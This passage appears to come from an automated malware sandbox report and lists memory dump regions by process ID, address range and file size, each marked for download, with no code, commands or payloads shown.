                                                            • memory/556-37-0x0000000000E00000-0x0000000000EB8000-memory.dmp

                                                              Filesize

                                                              736KB

                                                              Download

                                                            • memory/556-38-0x000000007373E000-0x000000007373F000-memory.dmp

                                                              Filesize

                                                              4KB

                                                              Download

                                                            • memory/556-39-0x0000000005DA0000-0x0000000006344000-memory.dmp

                                                              Filesize

                                                              5.6MB

                                                              Download

                                                            • memory/916-67-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/916-45-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/916-41-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/916-44-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/976-172-0x0000000000400000-0x000000000042F000-memory.dmp

                                                              Filesize

                                                              188KB

                                                              Download

                                                            • memory/1540-112-0x00000000009E0000-0x0000000000A58000-memory.dmp

                                                              Filesize

                                                              480KB

                                                              Download

                                                            • memory/1568-3047-0x0000000000A40000-0x0000000000EEC000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/1568-3535-0x0000000000A40000-0x0000000000EEC000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/1592-273-0x00000251AA610000-0x00000251AA632000-memory.dmp

                                                              Filesize

                                                              136KB

                                                              Download

                                                            • memory/1916-114-0x0000000000400000-0x0000000000465000-memory.dmp

                                                              Filesize

                                                              404KB

                                                              Download

                                                            • memory/1916-116-0x0000000000400000-0x0000000000465000-memory.dmp

                                                              Filesize

                                                              404KB

                                                              Download

                                                            • memory/2084-91-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/2084-93-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/2348-3109-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3266-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-2922-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3005-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3018-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3098-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-888-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3933-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-886-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3932-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3930-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3503-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3373-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3356-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2348-3225-0x0000000000400000-0x0000000000429000-memory.dmp

                                                              Filesize

                                                              164KB

                                                              Download

                                                            • memory/2400-291-0x0000000000C90000-0x0000000001159000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                              Download

                                                            • memory/2400-292-0x0000000000C90000-0x0000000001159000-memory.dmp

                                                              Filesize

                                                              4.8MB

                                                              Download

                                                            • memory/2412-168-0x0000000000A90000-0x00000000016D5000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                              Download

                                                            • memory/2412-166-0x0000000000A90000-0x00000000016D5000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                              Download

                                                            • memory/2412-144-0x0000000000A90000-0x00000000016D5000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                              Download

                                                            • memory/2412-171-0x0000000000A90000-0x00000000016D5000-memory.dmp

                                                              Filesize

                                                              12.3MB

                                                              Download

                                                            • memory/2732-164-0x00000000001D0000-0x0000000000666000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                              Download

                                                            • memory/2732-167-0x00000000001D0000-0x0000000000666000-memory.dmp

                                                              Filesize

                                                              4.6MB

                                                              Download

                                                            • memory/2916-70-0x00000000003C0000-0x00000000003E8000-memory.dmp

                                                              Filesize

                                                              160KB

                                                              Download

                                                            • memory/2916-74-0x000000001B290000-0x000000001B392000-memory.dmp

                                                              Filesize

                                                              1.0MB

                                                              Download

                                                            • memory/2968-254-0x0000028D42C50000-0x0000028D43178000-memory.dmp

                                                              Filesize

                                                              5.2MB

                                                              Download

                                                            • memory/2968-325-0x0000028D42960000-0x0000028D4296A000-memory.dmp

                                                              Filesize

                                                              40KB

                                                              Download

                                                            • memory/2968-222-0x0000028D282B0000-0x0000028D282C2000-memory.dmp

                                                              Filesize

                                                              72KB

                                                              Download

                                                            • memory/2968-223-0x0000028D28660000-0x0000028D28670000-memory.dmp

                                                              Filesize

                                                              64KB

                                                              Download

                                                            • memory/3928-16-0x00000000008D0000-0x0000000000D8B000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/3928-1-0x0000000077C94000-0x0000000077C96000-memory.dmp

                                                              Filesize

                                                              8KB

                                                              Download

                                                            • memory/3928-0-0x00000000008D0000-0x0000000000D8B000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/3928-2-0x00000000008D1000-0x00000000008FF000-memory.dmp

                                                              Filesize

                                                              184KB

                                                              Download

                                                            • memory/3928-3-0x00000000008D0000-0x0000000000D8B000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/3928-4-0x00000000008D0000-0x0000000000D8B000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4476-89-0x0000000000BD0000-0x00000000015BD000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                              Download

                                                            • memory/4476-118-0x0000000000BD0000-0x00000000015BD000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                              Download

                                                            • memory/4476-120-0x0000000000BD0000-0x00000000015BD000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                              Download

                                                            • memory/4476-117-0x0000000000BD0000-0x00000000015BD000-memory.dmp

                                                              Filesize

                                                              9.9MB

                                                              Download

                                                            • memory/4560-19-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-684-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-233-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-17-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-20-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-1014-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-71-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-3931-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-293-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-149-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-21-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-110-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-36-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-868-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-72-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-122-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-3298-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-2176-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4560-182-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/4636-198-0x00000000001C0000-0x00000000004C3000-memory.dmp

                                                              Filesize

                                                              3.0MB

                                                              Download

                                                            • memory/4636-203-0x00000000001C0000-0x00000000004C3000-memory.dmp

                                                              Filesize

                                                              3.0MB

                                                              Download

                                                            • memory/4640-119-0x0000000000400000-0x000000000042F000-memory.dmp

                                                              Filesize

                                                              188KB

                                                              Download

                                                            • memory/4640-126-0x0000000010000000-0x000000001001C000-memory.dmp

                                                              Filesize

                                                              112KB

                                                              Download

                                                            • memory/4640-121-0x0000000000400000-0x000000000042F000-memory.dmp

                                                              Filesize

                                                              188KB

                                                              Download

                                                            • memory/4796-271-0x0000000000DF0000-0x000000000148B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                              Download

                                                            • memory/4796-269-0x0000000000DF0000-0x000000000148B000-memory.dmp

                                                              Filesize

                                                              6.6MB

                                                              Download

                                                            • memory/4932-249-0x00000000009B0000-0x0000000000CBD000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                              Download

                                                            • memory/4932-289-0x00000000009B0000-0x0000000000CBD000-memory.dmp

                                                              Filesize

                                                              3.1MB

                                                              Download

                                                            • memory/5156-3530-0x00007FF756E80000-0x00007FF7584CB000-memory.dmp

                                                              Filesize

                                                              22.3MB

                                                              Download

                                                            • memory/5424-802-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/5424-777-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/5424-776-0x0000000000400000-0x000000000045B000-memory.dmp

                                                              Filesize

                                                              364KB

                                                              Download

                                                            • memory/5660-883-0x0000000000260000-0x00000000002C0000-memory.dmp

                                                              Filesize

                                                              384KB

                                                              Download

                                                            • memory/5660-3504-0x00007FF60F370000-0x00007FF60FF11000-memory.dmp

                                                              Filesize

                                                              11.6MB

                                                              Download

                                                            • memory/5800-4041-0x00000000004C0000-0x0000000000BAE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                              Download

                                                            • memory/5800-3983-0x00000000004C0000-0x0000000000BAE000-memory.dmp

                                                              Filesize

                                                              6.9MB

                                                              Download

                                                            • memory/5900-750-0x00000000008B0000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                              Download

                                                            • memory/5900-593-0x00000000008B0000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                              Download

                                                            • memory/5900-658-0x00000000008B0000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                              Download

                                                            • memory/5900-782-0x00000000008B0000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                              Download

                                                            • memory/5900-661-0x00000000008B0000-0x0000000000D1C000-memory.dmp

                                                              Filesize

                                                              4.4MB

                                                              Download

                                                            • memory/6016-3994-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/6016-4000-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/6044-668-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download

                                                            • memory/6044-607-0x0000000000440000-0x00000000008FB000-memory.dmp

                                                              Filesize

                                                              4.7MB

                                                              Download